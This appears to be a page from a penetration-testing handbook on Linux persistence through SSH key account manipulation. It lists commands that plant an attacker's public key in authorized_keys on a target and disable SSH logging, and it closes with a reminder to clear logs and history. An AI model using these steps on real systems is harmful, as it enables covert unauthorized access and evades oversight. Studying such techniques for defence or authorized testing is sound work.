handbook/tools/5.Machine/1.Linux/General/Exploitation/2.Persistence/1.Account-Manipulation.md
2024-08-31 01:07:22 +02:00

2 KiB

General

Account manipulation using SSH keys is a way for an attacker to gain access to a system without using a password. SSH (Secure Shell) keys are used to authenticate a user to a remote system, allowing them to log in without entering a password. Instead of a password, the user presents a private key file, which is then verified against a public key that is stored on the remote system. If the keys match, the user is authenticated and granted access to the system.

An attacker who has gained access to a user's private SSH key can use it to log in to the system without knowing the user's password. This can be done by copying the private key to the attacker's own system and using it to authenticate to the remote system. If the attacker is able to do this, they will be able to log in to the system and perform actions as if they were the legitimate user. This can allow the attacker to gain unauthorized access to sensitive data or to perform actions that would not normally be allowed.

Command

Modify /etc/ssh/sshd_config (Target Machine)

# Comment Elements
	# LogLevel INFO    ---> Comment this not not store the logs of the SSH
	# PasswordAuthentication yes   ---> Because we use a SSH Key to login

# Uncomment Elements
	PubkeyAuthentication yes       ---> Allow login with SSH Keys

Generating SSH Keys (Attacking Machine)

# Generate SSH Keys
ssh-keygen               ---> Generate SSH key pair

# Copy the SSH Keys
ls -al                   ---> List folder in home directory to see if .ssh folder is there
mkdir .ssh               ---> Create .ssh folder if needed
nano authorized_keys     ---> Create file for keys, and paste your id_rsa.pub value
SAVE

chmod 700 /home/USER/.ssh                    ---> Give the right permission to folder
chmod 600 /gome/USER/.ssh/authorized_keys    ---> Give the right permission to file

SSH Connection (Attacking Machine)

ssh USER@IP

===Dont Forget to Clear Tracks (Check 🧹 CLEAR Logs & History)===